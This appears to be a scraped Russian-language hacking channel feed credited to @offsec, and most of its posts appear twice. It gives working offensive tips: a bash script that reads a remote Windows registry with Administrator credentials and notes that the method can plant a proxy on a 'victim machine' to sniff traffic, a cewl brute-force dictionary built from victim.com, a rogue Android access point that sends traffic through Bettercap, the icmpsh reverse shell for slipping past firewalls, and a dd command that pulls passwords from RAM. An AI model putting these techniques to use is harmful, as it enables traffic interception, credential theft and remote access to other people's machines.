Когда из-под Linux нужно вытащить инфу из реестра с машины на Windows, например хостнейм:
#!/bin/bash
host="$1"
login_pass=\\Administrator%\<password>
rpc_cmd="net rpc registry enumerate"
reg_cname="HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName"
reg_autorun="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
cname=$rpc_cmd $reg_cname -I $host -U $login_pass | grep -A 2 ComputerName | tail -1 | sed -r 's/^[^"]+//' | sed -r 's/\"//g'
echo HOSTNAME = "$cname"
От себя добавлю, что таким способом можно прописать свой прокси сервер на машине-жертве, тем самым слушать трафик.
(c) @offsec
#bash #registry #hacks
#!/bin/bash
host="$1"
login_pass=\\Administrator%\<password>
rpc_cmd="net rpc registry enumerate"
reg_cname="HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName"
reg_autorun="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
cname=$rpc_cmd $reg_cname -I $host -U $login_pass | grep -A 2 ComputerName | tail -1 | sed -r 's/^[^"]+//' | sed -r 's/\"//g'
echo HOSTNAME = "$cname"
От себя добавлю, что таким способом можно прописать свой прокси сервер на машине-жертве, тем самым слушать трафик.
(c) @offsec
#bash #registry #hacks
Когда нужно создать словарь для брутфорса на основе какого-либо сайта:
(c) @offsec
#dictionary #bruteforce #hacks
cewl -m 4 -w ./dict.txt http://victim.com
(c) @offsec
#dictionary #bruteforce #hacks
Когда нужно быстро развернуть фейковую точку доступа, но на руках только андроид телефон (даже чужой):
1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер
(C) @offsec
#mitm #proxy #pentest #hacks
1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер
(C) @offsec
#mitm #proxy #pentest #hacks
Иногда proxychains не справляется с приложением и не может перенаправить трафик через сокс-прокси.
Для таких случаев (и не только) есть утилита tun2socks, которая создает виртуальное сетевое устройство TUN.
Решает все проблемы капризных приложений. Уровень абстракции на сетевом уровне ниже только tcp.
И конечно же надо добавить роуты.
#hacks #proxy #socks #tunnel
Для таких случаев (и не только) есть утилита tun2socks, которая создает виртуальное сетевое устройство TUN.
Решает все проблемы капризных приложений. Уровень абстракции на сетевом уровне ниже только tcp.
./badvpn-tun2socks --tundev mytun --netif-ipaddr 10.0.0.1 --netif-netmask 255.0.0.0 --socks-server-addr 127.0.0.1:12345
И конечно же надо добавить роуты.
#hacks #proxy #socks #tunnel
Иногда бывает ряд факторов, которые мешают установить reverse shell. Преграды бывают разные. Это и брэндмауер, и IPS/IDS, и другие сложности.
Если всяческие попытки тщетны, а shell на Windows машину установить надо (можно адаптировать клиент и на *nix системы), то есть такая утилита под названием icmpsh.
Запускаете мастер ноду у себя на Linux системе. И следом стартуете клиент на машине-цели.
https://github.com/commonexploits/icmpsh
#hacks #icmp #reverse #shell
Если всяческие попытки тщетны, а shell на Windows машину установить надо (можно адаптировать клиент и на *nix системы), то есть такая утилита под названием icmpsh.
Запускаете мастер ноду у себя на Linux системе. И следом стартуете клиент на машине-цели.
https://github.com/commonexploits/icmpsh
#hacks #icmp #reverse #shell
Github
GitHub - commonexploits/icmpsh: Simple reverse ICMP shell
icmpsh - Simple reverse ICMP shell
Бывает так, что вам нужно считать пароль либо любую другую текстовую информацию с RAM на хосте.
В таких случаях здорово выручит:
#perks #hacks #ram #volatility
В таких случаях здорово выручит:
sudo dd if=/dev/mem | cat | strings
#perks #hacks #ram #volatility
В продолжение темы про VPN.
Если вдруг ваша демократичная страна/провайдер/родитель заблокировал(а) VPN/Tor по сигнатурам трафика, то на помощь придёт obfsproxy.
Эта утилита обфусцирует трафик так, чтобы в итоге DPI не может определить его по сигнатурам.
https://github.com/isislovecruft/obfsproxy
(c) @offsec
#perks #hacks #obfsproxy #openvpn #DPI
Если вдруг ваша демократичная страна/провайдер/родитель заблокировал(а) VPN/Tor по сигнатурам трафика, то на помощь придёт obfsproxy.
Эта утилита обфусцирует трафик так, чтобы в итоге DPI не может определить его по сигнатурам.
https://github.com/isislovecruft/obfsproxy
(c) @offsec
#perks #hacks #obfsproxy #openvpn #DPI
GitHub
GitHub - isislovecruft/obfsproxy: Python version of obfsproxy, forked from https://git.torproject.org/pluggable-transports/obfsproxy.git
Python version of obfsproxy, forked from https://git.torproject.org/pluggable-transports/obfsproxy.git - isislovecruft/obfsproxy